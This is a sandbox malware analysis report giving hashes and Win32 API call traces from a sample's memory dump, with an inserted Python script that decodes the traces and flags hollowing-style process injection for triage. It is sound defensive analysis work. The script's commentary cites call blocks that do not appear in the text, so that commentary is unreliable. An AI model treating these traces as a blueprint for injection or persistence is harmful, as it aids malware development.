  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
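The "APIs" lists in these function blocks are the most useful part of the report for triage, but they are hard to read raw: every parameter is printed as an 8-digit hex stack slot, and the tracer prints every slot it recovered, not just the declared parameters (the 13 values after OpenProcess in the thread-manipulation block include 001C13BC, a return address into the sample's own image at 001C1000). The following script is an added example, not part of the Joe Sandbox report or its tooling. It parses lines in exactly the format used above, resolves the leading parameter slots of a few APIs against the Windows SDK constants (OpenProcess desired access, CreateFile access/share/disposition, DuplicateHandle options, SetFilePointer move method, registry root keys), and applies one heuristic of my own, not a sandbox signature: a function that opens another process, unmaps a section in a folded subcall (001DBD3F) and cycles a thread through ResumeThread, WaitForSingleObject and SuspendThread is consistent with hollowing-style injection. The sample input is copied verbatim from the thread block at the top of this section and from the OpenProcess(0x40)/DuplicateHandle, CreateFileW and SetFilePointer functions; the second sample deliberately mixes lines from different functions and is only there to exercise the decoder.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function block (added example, not
part of the report): parse each call, resolve well-known Win32 constants in the
leading parameter slots, and flag the resume/wait/suspend plus unmap pattern."""
import re
from collections import namedtuple

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>\w+)\."
    r"[A-Z0-9]+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HEX_RE = re.compile(r"^-?[0-9A-F]{8}$")

# Constants as defined in the Windows SDK headers (winnt.h, fileapi.h, winreg.h).
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
                  0x400: "PROCESS_QUERY_INFORMATION", 0x800: "PROCESS_SUSPEND_RESUME"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
DUP_OPTIONS = {1: "DUPLICATE_CLOSE_SOURCE", 2: "DUPLICATE_SAME_ACCESS"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
HKEY_ROOTS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
# api -> [(slot index, parameter name, table, decode as bit flags?)]
DECODERS = {
    "OpenProcess": [(0, "dwDesiredAccess", PROCESS_ACCESS, True)],
    "CreateFileA": [(1, "dwDesiredAccess", GENERIC_ACCESS, True), (2, "dwShareMode", SHARE_MODE, True),
                    (4, "dwCreationDisposition", DISPOSITION, False)],
    "DuplicateHandle": [(5, "dwOptions", DUP_OPTIONS, True)],
    "SetFilePointer": [(3, "dwMoveMethod", MOVE_METHOD, False)],
    "RegOpenKeyA": [(0, "hKey", HKEY_ROOTS, False)],
}
DECODERS["CreateFileW"] = DECODERS["CreateFileA"]
DECODERS["RegCreateKeyA"] = DECODERS["RegOpenKeyA"]

# args: int for recovered hex slots, str for '?' and string literals;
# subcall: address of the callee whose calls were folded into the block, or None.
ApiCall = namedtuple("ApiCall", "api args ref subcall")

def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        toks = [t.strip() for t in (m.group("args") or "").split(",") if t.strip()]
        args = [int(t, 16) if HEX_RE.match(t) else t for t in toks]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), args, int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

def _flags(value, table):
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)            # bits not covered by the table, kept as hex
    return "|".join(names + ([f"0x{rest:X}"] if rest else [])) or "0"

def decode(call):
    """Only the leading slots are interpreted: the report prints every recovered
    stack slot, so values past the declared parameter count (e.g. 001C13BC, a
    return address, after OpenProcess's three parameters) are not arguments."""
    out = {}
    for idx, name, table, bitflags in DECODERS.get(call.api, []):
        if idx < len(call.args) and isinstance(call.args[idx], int):
            v = call.args[idx]
            out[name] = _flags(v, table) if bitflags else table.get(v, hex(v))
    return out

def decoded_calls(text):
    """(api, call-site address) -> decoded parameters, for every call in the block."""
    return {(c.api, c.ref): decode(c) for c in parse_api_lines(text)}

def injection_indicators(text):
    """Heuristic (analyst judgement, not a sandbox signature): opening another
    process, unmapping a section and cycling a thread through resume/wait/suspend
    is consistent with hollowing-style code injection."""
    calls = parse_api_lines(text)
    names = {c.api for c in calls}
    direct = iter(c.api for c in calls if c.subcall is None)   # excludes folded subcalls
    hits = []
    if "OpenProcess" in names and "NtUnmapViewOfSection" in names:
        hits.append("opens a process and unmaps a section (incl. subcalls)")
    if all(any(a == want for a in direct) for want in ("ResumeThread", "WaitForSingleObject", "SuspendThread")):
        hits.append("ResumeThread -> WaitForSingleObject -> SuspendThread in call order")
    return hits

# Constructed input: lines copied verbatim from the thread-manipulation function above.
THREAD_FUNC = """\
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
"""
# Lines copied from three other functions, grouped here only to exercise the decoder.
MISC_CALLS = """\
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
"""
```

`decoded_calls(THREAD_FUNC)` resolves the OpenProcess in subcall 001D8325 to PROCESS_QUERY_INFORMATION only (enough for the IsWow64Process that follows it, not for writing into the target), and `injection_indicators(THREAD_FUNC)` reports both the section unmap and the resume/wait/suspend order; on the mixed sample it reports nothing, while decoding OpenProcess(0x40) to PROCESS_DUP_HANDLE, DuplicateHandle's last slot to DUPLICATE_SAME_ACCESS, CreateFileW to GENERIC_READ/no sharing/OPEN_EXISTING and SetFilePointer to FILE_END. Treat single-value lines such as WaitForSingleObject(00000064) with care: only one slot was recovered, so whether 0x64 is the handle or a 100 ms timeout cannot be read off the line alone.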
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
